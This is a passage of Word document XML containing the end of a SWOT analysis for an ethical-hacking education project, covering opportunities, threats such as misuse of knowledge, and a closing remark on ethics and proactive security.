      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Learning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Distributed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Denial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(DDoS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacks or spear-phishing techniques can expand knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FD6A7" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="661"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Improving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>foundation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>research</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">implement effective mitigation strategies like rate limiting, encryption, and user awareness </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA7440" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="234"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Certifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Career</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Growth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Practical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>experience</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ethical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lead</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to certifications (e.g., CEH) and career opportunities in cybersecurity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A7BD6" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Threats:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DB09E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="980"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Misuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Knowledge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ethical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>practices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adhered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>misuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of techniques can lead to legal and ethical violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED48C9" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="241"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evolving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Threats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cyberattacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>constantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>evolving,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>requiring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>continuous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>learning to keep up with new vulnerabilities and attack methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E0104" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="463"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>While</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>testing,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>improperly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>secured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>potentially expose unintended weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2749C08F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This SWOT analysis and conclusion emphasize the educational value of the project while stressing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>importance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ethics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>you'd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>like further adjustments!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00034D15">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1240" w:right="1440" w:bottom="280" w:left="1080" w:header="763"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29D93" w14:textId="77777777" w:rsidR="000B28F5" w:rsidRDefault="000B28F5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F8133FA" w14:textId="77777777" w:rsidR="000B28F5" w:rsidRDefault="000B2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7AEBE" w14:textId="77777777" w:rsidR="000B28F5" w:rsidRDefault="000B28F5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28D836AF" w14:textId="77777777" w:rsidR="000B28F5" w:rsidRDefault="000B2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FA54A" w14:textId="1D19D289" w:rsidR="00034D15" w:rsidRDefault="00034D15">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35CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E95869DA"/>
    <w:lvl w:ilvl="0" w:tplc="500C3CEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="562" w:hanging="202"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="86"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E6FE1A68">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1476" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="697E7168">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2392" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1FDCC178">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3308" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="92A4179E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4224" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6CC88C9E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5140" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
